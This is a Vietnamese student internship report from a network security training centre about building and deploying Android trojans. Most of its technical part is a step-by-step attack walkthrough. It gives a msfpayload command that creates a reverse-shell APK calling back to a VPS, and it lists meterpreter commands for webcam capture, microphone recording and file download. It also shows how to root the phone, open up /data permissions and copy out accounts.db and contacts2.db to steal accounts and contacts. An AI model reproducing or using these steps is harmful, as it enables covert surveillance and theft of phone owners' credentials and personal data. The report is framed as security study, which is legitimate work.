ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP Đề tài: Nghiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điên thoại sử dụng Android gửi GVHD: Thầy Võ Đỗ Thắng SVTH: Tô Thị Hường MSSV: 1120066 TPHCM, ngày 14 tháng năm 2014 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI MỞ ĐẦU Trong năm gần đây, vấn đề “An toàn bảo mật thơng tin” ngày nóng Với phát triển đến chóng mặt tảng động iOS, Android, Windows Phone với nhiều dòng điện thoại thông minh, vấn đề bảo, mật thông tin chuyển dần xu hướng từ PC sang mobile đặc biệt Smartphone Nếu bạn sở hữu Smartphone Apple, Google Nexus, Samsung, Nokia, HTC, Sony,…liệu bạn có dám chắn “dế cưng” khơng bị nhiễm phần mềm gián điệp, nghe khơng? Vì lại vậy? Vì theo báo cáo gần hãng phần mềm bảo mật Kaspersky Lab, Norton AV, Avast hay BKAV số lượng Smartphone bị nhiễm mã độc ngày tang Đặc biệt hệ điều hành Android hệ điều hành phát triển nhanh năm gần đây, mảnh đất béo bở cho Hacker công Với nhẹ tin, thiêu hiểu biết người dùng, long tham thứ “Free” free app, free wifi vơ tình tiếp tay cho Hacker xâm nhập cài mã độc điện thoại bạn Đề tài “Ngiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điện thoại Android gửi ngồi” giúp giúp nghiên cứu tìm hiểu cách thức hoạt động, chia sẻ thông tin cung cấp giải pháp để phòng tránh SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng MỤC LỤC LỜI MỞ ĐẦU MỤC LỤC LỜI CAM ĐOAN LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG LỜI CẢM ƠN TRUNG TÂM ATHENA NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM NHẬN XÉT CỦA KHOA A GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP B NỘI DUNG THỰC TẬP 10 I Làm localhost 10 Giới thiệu HĐH Kali Linux 10 Cài đặt Kali Linux VMware: 12 Giới thiệu HĐH Android 23 Tạo mã độc Kali Linux 29 Đưa mã độc vào thiết bị Android 34 Xâm nhập SD card thiết bị Android từ Kali Linux 38 Cài đặt, nghiên cứu Trojan iCalendar Android 40 7.1 Giới thiệu 40 7.2 Hướng dẫn thực Trojan iCalendar Android 44 II Làm trên môi trường VPS 49 Giới thiệu VPS 49 Cài đặt mã độc VPS 50 Từ VPS xâm nhập vào thiết bị Android 56 Đánh cắp tài khoản 60 III KẾT QUẢ ĐẠT ĐƯỢC 63 SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CAM ĐOAN Tôi xin cam đoan:  Những nội dung báo cáo thực hướng dẫn trực tiếp thầy Võ Đỗ Thắng  Mọi tham khảo dùng báo cáo trích dẫn rõ ràng tên tác giả, tên cơng trình, thời gian, địa điểm công bố  Mọi chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, xin chịu hoàn toàn trách nhiệm TPHCM, ngày 14 tháng năm 2014 Sinh viên thực tập Tô Thị Hường Danh sách clip: - Clip giới thiệu thân trung tâm Athena https://www.youtube.com/watch?v=zoIZJRZQnws - Cài Kali Linux https://www.youtube.com/watch?v=HysZBsppSRY&feature=em-upload_owner - Tạo mã độc Kali Linux https://www.youtube.com/watch?v=4nunk80pE48 - Tạo mã độc VPS https://www.youtube.com/watch?v=n6Cy_g9fuu4&feature=youtu.be SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG Tôi xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên khoa Điện tử Viễn thông tạo điều kiện cho tơi hồn thành tốt đợt thực tập Trong đợt thực tập cho kinh nghiệm quý báu Những kinh nghiệm giúp tơi hồn thiện cơng việc mơi trường làm việc sau Mặc dù cố gắng hoàn thành báo cáo thực tập với tất nỗ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Tơi mong nhận đóng góp, chia sẻ để tơi làm tốt Một lần xin chân thành cảm ơn TPHCM, ngày 14 tháng năm 2014 Sinh viên thực tập Tô Thị Hường SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CẢM ƠN TRUNG TÂM ATHENA Tôi xin cảm ơn giám đốc Công Ty Quản Trị An Ninh Mạng Quốc Tế Athena, anh chị công ty Đặc biệt, xin chân thành cảm ơn thầy Đỗ Võ Thắng nhiệt tình giúp đỡ hướng dẫn tơi suốt thời gian thực tập công ty Thầy tạo điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết đóng góp ý kiến quý báu để hoàn thành tốt báo cáo Mặc dù tơi cố gắng hồn thành báo cáo thực tập tốt nghiệp với tất nỗ lực thân Nhưng trình độ hiểu biết kinh nghiệm thực tế có hạn nên chắn khơng thể tránh khỏi thiếu sót định Tơi mong nhận đóng góp, chia sẻ để tơi làm tốt Một lần xin chân thành cảm ơn TPHCM, ngày 14 tháng năm 2014 Sinh viên thực tập Tô Thị Hường Chú thích: hình chụp Giáo viên hướng dẫn (Th.Võ Đỗ Thắng) với sinh viên thự tập (Tô Thị Hường) SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN TẠI TRUNG TÂM TPHCM, ngày tháng năm 2014 Giảng Viên Hướng Dẫn SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng NHẬN XÉT CỦA KHOA TPHCM, ngày tháng năm 2014 Trưởng Khoa SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng A GIỚI THIỆU VỀ TRUNG TÂM THỰC TẬP Cơ sở 1_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA Số Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99 Cơ sở 2_Tại TP Hồ Chí Minh: - Trung Tâm Đào Tạo Quản Trị Mạng An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam Website: www.athena.edu.vn or www.athena.com.vn Điện thoại: (84-8) 2210 3801 Hotline: 0943 20 00 88 - Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA thành lập từ năm 2004, tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy động, nhiệt huyết kinh nghiệm lãnh vực CNTT, với tâm huyết góp phần vào cơng thúc đẩy tiến trình đưa cơng nghệ thơng tin ngành kinh tế mũi nhọn, góp phần phát triển nước nhà - Lĩnh vực hoạt động:  Trung tâm ATHENA tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo tiêu chuẩn quốc tế hãng tiếng Microsoft, Cisco, Oracle, Linux LPI, CEH Song song đó, trung tâm ATHENA cịn có chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng đơn vị Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, quan phủ, tổ chức tài chính…  Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều ngành Cục Công Nghệ Thơng Tin - Bộ Quốc Phịng , Bộ Cơng An, Sở Thông Tin Truyền Thông tỉnh, bưu điện tỉnh,…  Ngồi chương trình đào tạo, Trung tâm ATHENA cịn có nhiều chương trình hợp tác trao đổi công nghệ với nhiều đại học lớn đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thơng, Hiệp hội an tồn thơng tin (VNISA), Viện Kỹ Thuật Quân Sự… - Đội ngũ giảng viên:  Tất giảng viên trung tâm ATHENA có tốt nghiệp từ trường đại học hàng đầu nước Tất giảng viên ATHENA phải có chứng quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH,có sư phạm Quốc tế (Microsoft Certified Trainer) Đây chứng chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy trung tâm ATHENA  Bên cạnh đó, giảng viên ATHENA thường tu nghiệp cập nhật kiến thức công nghệ từ nước tiên tiến Mỹ , Pháp, Hà Lan, Singapore, truyền đạt công nghệ chương trình đào tạo trung tâm ATHENA SVTT: Tô Thị Hường – 1120066 Trang Báo cáo thực tập II GVHD: Thầy Võ Đỗ Thắng Làm trên môi trường VPS Giới thiệu VPS Định nghĩa Máy chủ ảo (Virtual Private Server -VPS) phương pháp phân chia máy chủ vật lý thành nhiều máy chủ ảo Trong server chạy Share Host có hàng trăm tài khoản chạy lúc, server chạy VPS số 1/10 Do vậy, VPS có hiệu cao Share Host nhiều Mỗi máy chủ hệ thống hồn tồn riêng biệt, có hệ điều hành riêng, có tồn quyền quản lý root restart lại hệ thống lúc Do vậy, VPS hạn chế 100% khả bị hack local Trên server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, Website bị công Ddos, botnet mạnh làm ảnh hưởng đến Website khác server, riêng server VPS, tài khoản VPS bị công tài khoản khác VPS hoạt động bình thường VPS dành cho doanh nghiệp vừa trang Web lớn mã nguồn nặng, chạy Share Host không đáp ứng đủ yêu cầu.Tuy nhiên, VPS địi hỏi người sử dụng phải có thêm số kiến thức bảo mật, cấu hình server,… Đặc điểm thơng số VPS Hoạt động hồn tồn server riêng nên sở hữu phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa IP riêng hệ điều hành riêng Tiết kiệm nhiều chi phí so với việc thuê server riêng Ngoài việc dùng VPS để thiết lập Web Server, Mail Server ứng dụng khác cài đặt để thực yêu cầu riêng truy cập Web trình duyệt Web VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài ngun dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống Có thể cài lại hệ điều hành với thời gian từ 5-10 phút Giá trị sử dụng VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp Miễn phí chi phí cài đặt ban đầu cấu hình hoạt động cho khác hàng SVTT: Tơ Thị Hường – 1120066 Trang 49 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Hỗ trợ khác hàng cài đặt miễn phí thêm phần mềm riêng Được cấu hình cài đặt hệ thống Firewall DDOS Protection Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng có cố phát sinh Cài đặt mã độc VPS Giới thiệu Metasploit công cụ khai thác lỗ hổng hệ điều hành, dùng để kiểm tra, công khai thác lỗi service Metasploit xây dựng từ ngôn ngữ hướng đối tượng Perl, với components viết C, assembler, Python Metasploit chạy hầu hết hệ điều hành: Linux, Windows, Mac OS Cài đặt Tải gói cài đặt Metasploit, ta có phiên Pro Community Ta chọn phiên Community miễn phí dùng cho nghiên cứu SVTT: Tơ Thị Hường – 1120066 Trang 50 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau tải gói cài đặt Metasploit Community ta cài đặt phần mềm khác Chọn folder cài đặt: Cổng dịch vụ Metasploit sử dụng, mặc định 3790: Chọn server ngày hết hạn, để mặc định: SVTT: Tô Thị Hường – 1120066 Trang 51 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Quá trình cài đặt Metasploit: Tiến trình hồn tất, chọn Finish truy cập đến giao diện web chương trình: SVTT: Tơ Thị Hường – 1120066 Trang 52 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau Finish trình duyệt web mở lên tới giao diện Click vào link: https://localhost:3790/ dẫn đến trang tạo tài khoản để login vào Metasploit Điền Username, Password sử dụng số thông tin bổ xung, chọn Create Account: SVTT: Tô Thị Hường – 1120066 Trang 53 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Trình duyệt chuyển đến trang nhập key để active chương trình, key gửi miễn phí đến mail tải phần mềm Sau điền key nhấn Activate License: Giao diện chương trình Metasploit Console SVTT: Tô Thị Hường – 1120066 Trang 54 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng SVTT: Tô Thị Hường – 1120066 Trang 55 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Từ VPS xâm nhập vào thiết bị Android a Các bước thực  Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android mang LAN với địa IP địa VPS Chúng ta sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R > /root/Desktop/files.apk Ở địa VPS 14.0.21.132  Khởi động Metasploit Console VPS Chúng ta thực bước xâm nhập đề cập phần trên, khác sử dụng IP VPS SVTT: Tô Thị Hường – 1120066 Trang 56 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Sau máy nạn nhân tải file apk tạo ra, máy android bị hack SVTT: Tơ Thị Hường – 1120066 Trang 57 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng  Sử dụng lệnh Help để xem lệnh metasploit hỗ trợ Để xem thông tin máy, nhập lệnh sysinfo Để xem tác vụ chạy gõ ps Xem ip gõ ifconfig Xem danh sách thư mục, file gõ ls Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình camera, nhập webcam_snap x với x id camera xem danh sách camera phần trước Ghi âm Để thực ghi âm, nhập lênh record_mic file ghi âm lưu máy SVTT: Tô Thị Hường – 1120066 Trang 58 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Lấy file từ sd card Để vào sdcard, nhập lệnh: cd /sdcard lệnh ls để xem danh sách file, thư mục Dùng lệnh cd /sdcard/Download để vào thư mục Để tải máy, ta nhập lệnh Download App.apk Để upload gõ lệnh upload Và file tải thư mục root máy Kali Gõ shell để vào lệnh kiểm tra xem có root chưa gõ su whoami Nếu báo unknown id is tức root ls -l danh mục file quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk thay đổi quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ để xem danh sách down load file hay thay đổi file ROM phải gõ lệnh SU để có tồn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại Sử dụng SQLite để mở file db SVTT: Tô Thị Hường – 1120066 Trang 59 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Đánh cắp tài khoản Trước tiên ta phải vào hệ thống máy android Lưu ý: máy android phải root trước Ta dùng lênh shell để vào hệ thống Dùng lệnh su để toàn quyền truy cập Dùng lệnh whoami để biết máy android root chưa Nếu thơng báo là:unknown uid Ta gõ cd /data/system để vào thư mục system Tiếp theo gõ ls –l để xem thư mục có SVTT: Tơ Thị Hường – 1120066 Trang 60 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db Sdcard Sau ta trở meterpreter lệnh exit dùng lệnh download file accounts.db máy VPS Tiếp tục ta vào địa SVTT: Tô Thị Hường – 1120066 Trang 61 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng /data/data/com.android.providers.contacts/databases để copy file contacts2.db Sdcard Sau ta download file contacts2.db máy VPS Ta mở file *.db phần mềm SQLite Ta down phần mềm vài cài vào VPS SVTT: Tô Thị Hường – 1120066 Trang 62 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng III KẾT QUẢ ĐẠT ĐƯỢC Những kiến thức lý thuyết củng cố:     Tìm hiểu lịch sử, trình phát triển hệ điều hành Android Tìm hiểu hệ điều hành Kali Linux Tìm hiểu lỗ hổng bảo mật Windows Android Tìm hiểu cách sửa đổi file APK thực Signing ứng dụng Những kỹ thực hành học thêm:  Thực cài đặt Android máy ảo  Cài đặt Kali Linux, sử dụng để hack vào lỗ hổng bảo mật Windows Android  Thi lấy chứng System Hacking trung tâm Athena  Thực sửa đổi, tạo file Trojan, Backdoor sau cài đặt vào Android  Biết thêm số học lớp Hacker mũ trắng Những kinh nghiệm thực tiễn tích lũy được: Qua gần tháng thực tập, thân em đúc kết nhiều kinh nghiệm quý báu, thứ kĩ chuyên môn, em học cố kiến thức bên cạnh kiến thức tảng Hơn q trình thực tập mơi trường doanh nghiệp cho em làm quen dần để khơng bỡ ngỡ q trình làm sau này, thông qua kĩ giao tiếp ứng xử SVTT: Tô Thị Hường – 1120066 Trang 63 ... – 1120066 Trang Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng LỜI CAM ĐOAN Tôi xin cam đoan:  Những nội dung báo cáo thực hướng dẫn trực tiếp thầy Võ Đỗ Thắng  Mọi tham khảo dùng báo cáo trích dẫn... 1120066 Trang 17 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng Hình 2.1.12 Partition disks (Step 1) Hình 2.1.13 Partition disks (Step 2) SVTT: Tô Thị Hường – 1120066 Trang 18 Báo cáo thực tập GVHD:... 1120066 Trang 35 Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng  Sử dụng camera: Để xem danh sách camera, nhập webcam_list Để chụp hình camera, nhập webcam_snap x với x id camera xem danh sách camera phần